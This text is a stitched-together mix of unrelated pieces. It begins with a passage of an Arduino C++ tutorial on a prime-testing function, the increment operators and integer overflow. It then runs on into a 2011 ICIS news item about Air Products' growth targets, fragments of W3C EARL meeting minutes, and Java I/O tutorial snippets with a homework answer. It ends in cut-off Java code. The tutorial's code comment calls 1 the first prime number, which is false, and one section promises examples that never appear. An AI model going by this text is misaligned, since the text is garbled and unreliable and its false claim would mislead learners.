Note that the first word in the function is bool. This word defines the type of data that is returned when the function is called. In our case, we have defined the Prime() function to return a boolean data type, so we must include at some point either the statement return(true) or return(false) to return the result to the caller. If the function returned an integer, we would define it this way: int Prime(int x).
- If a function does not return any value but simply does its job and just ends, then we have to declare it as void (empty). We already know two of these functions well: setup() and loop().
Let’s see what the code inside the Prime() function could look like:
bool Prime(int n)
{
  for (int i = 2; i < n; i++)
  {
    if (n % i == 0)  // If the remainder is 0 then the number is divisible and is not prime.
    {
      Serial.println(String(n) + " is divisible by: " + String(i));
      return(false);
    }
  }
  return(true);
}
To find out whether a number n is prime or not, we only have to divide it by all positive numbers greater than 1 and less than n. In the example, we divide the number n by all positive numbers ranging between 2 and n-1.
If we find out, inside the for loop, that the remainder of n modulo i (n % i == 0) is equal to zero, then the number n is divisible by i and is not a prime number. That implies that we must return false to the instruction that called the function.
If no divisor is found, the function only has to return true after the for loop. This is called a brute force method and can certainly be improved, but it works for the moment.
To use the Prime() function we have to pass it an integer as argument, int n. An argument or parameter is the data that we pass to the function so that it can perform its task. Remember that when we defined the function we wrote: bool Prime(int n), where n represents the number we want to check.
Let’s write the loop() function to check whether it works:

Sketch 8.1
void loop()
{
  int x = 427;  // The number to test
  bool p = Prime(x);
  if (p)
    Serial.print(String(x) + " is prime.");
  else
    Serial.print(String(x) + " is not prime.");
}
Let’s see how many primes there are up to 1024.

Sketch 8.2
bool control = true;
int maximum = 1024;

void loop()
{
  if (control)  // This control variable prevents the if block from repeating again and again
  {
    Serial.println("These are the prime numbers up to " + String(maximum));
    Serial.println("-----------------------------------------");
    Serial.println("Prime number position = \t1: \t Prime number = 1");  // 1 is the first prime number but we don't use it later, of course
    int counter = 1;
    for (int x = 2; x < maximum; x++)
    {
      bool p = Prime(x);
      if (p) {
        counter++;
        Serial.println("Prime number position = \t" + (String)counter + ": \t Prime number =\t" + x);
      }
    }
  }
  control = false;
}

bool Prime(int n)
{
  for (int i = 2; i < n; i++)
  {
    if (n % i == 0)  // If the remainder is 0 then the number is divisible and is not prime.
      return(false);
  }
  return(true);  // If this statement is executed then we have not found any divisor and the number is prime
}
Although the program works correctly, the output is not very compact (remember that we like to be stylish). Let’s give the output a more appropriate format by using the tab character (represented as '\t') and a comma.

Sketch 8.3
bool control = true;
int maximum = 1024;
int counter = 1;

void loop()
{
  if (control)  // This control variable prevents the if block from repeating again and again
  {
    Serial.println("These are the prime numbers up to " + String(maximum));
    for (int x = 2; x < maximum; x++)
    {
      if (Prime(x))
        if (counter++ % 8 == 0)
          Serial.println(String(x) + ",");
        else
          Serial.print(String(x) + "," + '\t');
    }
  }
  control = false;
}
Now the program formats the output in a slightly more presentable and comfortable way to be read.
To achieve this, we have added a comma and a tab after each number except the last one in each row, because we have used rows that contain eight columns. When we reach the eighth column, instead of Serial.print() we use Serial.println(), which also appends a line break (a new line plus carriage return).
We should also comment on the following line:
if (counter++ % 8 == 0)
When we write two plus symbols after the name of a variable, ++, that indicates C++ that it must use the current value of the variable and after that increase its value by 1. Technically speaking, these two plus symbols are called the post-increment operator.
We could also have written the instruction this way:
if (++counter % 8 == 0)
In the last instruction C++ increases the value of the counter variable by one before using it. This notation is quite common in C++ and we should recognize it. We call the two plus symbols before the name of a variable the pre-increment operator.
There is another pair of operators that can be used to decrement the value of a variable (counter in our case): the pre-decrement operator, --counter, and the post-decrement operator, counter--.
THE INTEGER DATA TYPE
This would be a good time to wonder how much our integer variable could grow in the previous program. We assigned it a value of 1024, but does the integer data type have a size limit?
The answer is yes. The integer data type in Arduino C++ uses 16 bits, so it can represent 2¹⁶ = 65,536 distinct values; counting zero, the largest of those would be 65,535. But as the integer data type is signed, the values actually range from -32,768 to +32,767.
In fact, Arduino C++ provides several data types to handle integer numbers: byte (8 bits, 0 to 255), int (16 bits, -32,768 to 32,767), unsigned int (16 bits, 0 to 65,535), long (32 bits, -2,147,483,648 to 2,147,483,647) and unsigned long (32 bits, 0 to 4,294,967,295).
All these data types represent signed and unsigned integers and can be used to work with really big numbers, but all of them have a size limit.
In fact, C++ has the nasty habit of expecting us to make sure that a value fits into its variable. When it does not, we call it overflow, and C++ completely ignores the issue, leading to problems that are difficult to detect if one does not tread carefully.
Try this:
int i = 32767;
Serial.println(i + 1);
You see immediately that if i is equal to 32767 and we increase its value by 1, C++ interprets the result as negative. That is because C++ simply does not control overflow.
Let’s also try the following operation:
int i = 32767;
Serial.println(2 * i + 1);
According to Arduino, the result is -1.
- This is not a mistake; it was decided this way. C++ does not control overflows, so be very careful, because this kind of mistake can be very difficult to detect.
MORE ON FUNCTIONS IN C++
When we declare a function we must specify which kind of data type it returns. Let’s see some examples:
A function can return any data type defined in C++, but only a single value each time if we use the return() statement. It is specifically not allowed to return more than one value. If this is required, there are other solutions that we will see later.
- We can deal with this problem by using global variables or passing values by reference. We will discuss it in further chapters.
What is in fact allowed is to pass several arguments to a function:
int Function5 ( int x , String s , long y)
In this example we have declared a function, Function5(), that has three arguments: an integer, a String and a long, respectively.
Summary
- We have defined our own function to find out whether a number is prime.
- We have seen that the integer data type has a size limit.
- We have met data types with different capacities to handle larger or smaller integer numbers, but all of them still have a size limit.
- Data type overflow is a key concept and should be taken into account when we work with integers.
- We have been playing with logical problems and we have seen some solutions that can help you find some of your own.
09 June 2011 16:09 [Source: ICIS news]
HOUSTON (ICIS)--Air Products intends to increase its growth by 11%–13% per year to achieve total revenues of $15bn (€10bn) in 2015, the US-based international industrial gases major said on Thursday.
The target compares with full-year sales of $9bn that Air Products recorded in its 2010 fiscal year.
CEO John McGlade said Air Products’ operating margin should improve by 300 basis points to 20% and its return on capital should increase by 150 basis points to 15% from 2011 to 2015.
The company would achieve the improvement through its strong positions in energy, environmental and emerging markets worldwide, he said.
Air Products' innovation, improvement and integration actions should allow the company to continue to lower its costs, improve returns and gain a greater competitive advantage over its peers, McGlade told investors at a conference.
($1 = €0.69)
See also: IRC log
saz: testCase and testRequirement
carlosi: requirement != test
saz/carlosi: should we allow multiple requirements in one assertion?
<JibberJim> I think test case and requirement is a good thing, I agree with carlos's emails.
<drooks> it may take several test cases to prove a requirement... hence an assertion should be allowed to have multiple test cases
<JibberJim> Yes shadi, that's what I meant, and we allow both
Carlos, jim: requirement <--> testcase is a many-to-many thing
RESOLUTION: testCase and testRequirement are distinct and should be both included
<shadi>
saz: earl for streaming contents?
jim: EARL doesn't need to do anything. We already allow people to define their own pointers into contents
<JibberJim> Yes
saz: nice to speel that out + example for earl
guide
... no meet next week; use mailinglist
<shadi> ci: about to propose additions to the schema
saz: one namespace for http?
jim: yes
CarlosI: possible ambiguity re: extension headers
nrk: http:request-this, http:response-that
... two-level namespace
saz: that looks like what johannes suggests
provisional resolution as above, but wait for johannes before firming it up?
Java I/O Buffered Streams
In this section we will discuss the I/O Buffered Streams. In Java programming, when we are doing input and output operations... stream classes, and the other two are the buffered character streams.

Related topics:
- I/O stream class: Explain the hierarchy of the Java I/O stream classes (Hierarchy of Java I/O streams). Have a look at the following link: Java I/O
- Java I/O Examples
- Streams: In this section we discuss the I/O Byte Streams.
- Java I/O Character Streams: In this section we will discuss the I/O Character Streams.
- Java I/O Buffered Streams: In this section we...
- Java I/O From the Command Line: In this section we will learn about the I/O..., by default. There are three Standard Streams which are supported by Java... output streams which are the character streams.
- System.console(): This is a new feature added in Java SE 6, which has the ability to read... entry. The Console object provides input and output streams which are true character I/O.
i/o
Write a Java program to do the following:
a. Write into a file the following information regarding the marks for 10 students in a test:
   i. Matric no
   ii. Marks for question 1
   iii. Marks for question 2
   iv. Marks
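A sketch of how part (a) could start (the file name, record layout and sample data are my assumptions; the original question is truncated):

```java
import java.io.FileWriter;
import java.io.IOException;
import java.io.PrintWriter;

public class MarksWriter {
    public static void main(String[] args) throws IOException {
        // Sample records: matric no, marks for question 1, marks for question 2.
        String[][] records = {
            {"A001", "8", "7"},
            {"A002", "6", "9"},
            {"A003", "10", "5"},
        };
        try (PrintWriter out = new PrintWriter(new FileWriter("marks.txt"))) {
            for (String[] r : records) {
                out.println(String.join(",", r));  // one CSV line per student
            }
        }
        System.out.println("Wrote " + records.length + " records to marks.txt");
    }
}
```

Extending it to 10 students and the remaining fields is just a matter of adding rows and columns to the records array.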
I/O Java

import java.io.File;
import java.io.FileNotFoundException;
...
(File file) {
    // if the file extension is .txt or .java return true, else false
    if (file.getName().endsWith(".txt") || file.getName().endsWith(".java